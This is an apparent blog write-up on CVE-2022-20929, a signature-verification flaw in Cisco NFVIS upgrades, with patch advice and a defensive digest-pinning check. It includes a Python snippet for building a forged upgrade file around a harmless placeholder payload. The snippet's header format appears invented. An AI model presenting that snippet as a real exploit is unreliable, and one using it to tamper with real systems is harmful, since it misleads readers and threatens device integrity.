Cisco Enterprise NFV Infrastructure Software (NFVIS) is affected by a severe vulnerability, identified as CVE-2022-20929. It allows an unauthenticated, local attacker to provide an unauthentic upgrade file for upload, compromising the integrity and security of the NFVIS system. The cause is insufficient cryptographic signature verification of upgrade files. This post explains the vulnerability, the associated risks, and how it can be exploited.

The Vulnerability (CVE-2022-20929)

Cisco Enterprise NFV Infrastructure Software (NFVIS) is a network functions virtualization infrastructure software that allows businesses to deploy and manage virtualized network functions (VNFs). The vulnerability in the upgrade signature verification within NFVIS might enable an attacker to provide an unauthentic upgrade file for upload, paving the way for a potential security breach.

The root cause of this vulnerability is the insufficient cryptographic signature verification of upgrade files. In a normal scenario, an administrator uploads a new upgrade file to the NFVIS system, and the system checks the file's cryptographic signature to ensure both its authenticity and integrity. The vulnerable version of NFVIS fails to perform this verification step adequately, so a file that is not authentic can be accepted.

Exploit Details

An attacker could exploit this vulnerability by providing an administrator with an unauthentic upgrade file, bypassing the insufficient cryptographic signature verification process. If the administrator uploads this unauthentic file to the system, the attacker can fully compromise the Cisco NFVIS system.

Here's a code snippet demonstrating how an attacker could potentially craft an invalid upgrade file:

import os

def create_upg_header(payload_len):
    """Build the header bytes that precede the payload in this example."""
    # Four zero bytes, then the payload length as a 4-byte big-endian integer
    header = b'\x00\x00\x00\x00' + payload_len.to_bytes(4, 'big')
    header += b'\x00\x01\x02\x03'  # Fake signature
    header += b'\xFF\xFF\xFF\xFF'
    header += os.urandom(32)  # Random fake signature

    return header

def create_fake_upg_file(fake_upg_file, payload):
    """Write the header followed by the payload to fake_upg_file."""
    payload_len = len(payload)

    with open(fake_upg_file, 'wb') as f:
        f.write(create_upg_header(payload_len))
        f.write(payload)

if __name__ == "__main__":
    payload = b'fake_software_payload'
    fake_upg_file = "fake_software.upg"
    create_fake_upg_file(fake_upg_file, payload)

Mitigation

Cisco has released a patch that fixes this vulnerability and recommends that all NFVIS users apply it as soon as possible. To prevent exploitation of this vulnerability, you must upgrade your Cisco NFVIS system to the latest version that contains the patch.
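
Because the attack depends on an administrator uploading a file that did not come from the vendor, the following added example (not code from this post or from Cisco) shows a pre-upload check that pins each upgrade file to a SHA-512 digest obtained out-of-band. It is digest pinning, not a substitute for the device's own signature verification; the file names, sample bytes and the `trusted_digests` mapping are constructed assumptions.

```python
import hashlib
import hmac
import os
import tempfile

def sha512_file(path, chunk_size=1 << 20):
    """Stream the file so large upgrade images are not read into memory at once."""
    digest = hashlib.sha512()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def is_trusted_upgrade(path, trusted_digests):
    """Return True only if the file's SHA-512 matches the pinned value.

    trusted_digests maps file name -> hex digest (assumption: taken from a
    trusted channel, never from the source that delivered the file itself).
    """
    expected = trusted_digests.get(os.path.basename(path))
    if expected is None:
        return False  # fail closed: a file with no pinned digest is rejected
    actual = sha512_file(path)
    # Normalise case/whitespace, then compare in constant time
    return hmac.compare_digest(actual, expected.strip().lower())

def demo():
    """Constructed sample: a genuine image, the same image modified, an unlisted file."""
    with tempfile.TemporaryDirectory() as d:
        image = os.path.join(d, "release.upg")  # hypothetical file name
        with open(image, "wb") as f:
            f.write(b"constructed genuine image bytes")
        pinned = {"release.upg": sha512_file(image).upper()}
        genuine_ok = is_trusted_upgrade(image, pinned)
        with open(image, "ab") as f:  # simulate a modified file
            f.write(b"\x00")
        modified_ok = is_trusted_upgrade(image, pinned)
        other = os.path.join(d, "other.upg")
        with open(other, "wb") as f:
            f.write(b"constructed genuine image bytes")
        unlisted_ok = is_trusted_upgrade(other, pinned)
    return genuine_ok, modified_ok, unlisted_ok

if __name__ == "__main__":
    print(demo())
```
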

For more details on this vulnerability, you can refer to the official Cisco Advisory:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nfvis-2aW9NjK

Conclusion

CVE-2022-20929 is a severe vulnerability in the Cisco Enterprise NFV Infrastructure Software (NFVIS) that allows an attacker to provide an unauthentic upgrade file for upload. It results from insufficient cryptographic signature verification of upgrade files. It is essential to install the latest patch provided by Cisco and ensure your network's security against potential attacks. Stay vigilant and keep your systems up-to-date.

Timeline

Published on: 03/10/2023 21:15:00 UTC
Last modified on: 03/16/2023 13:22:00 UTC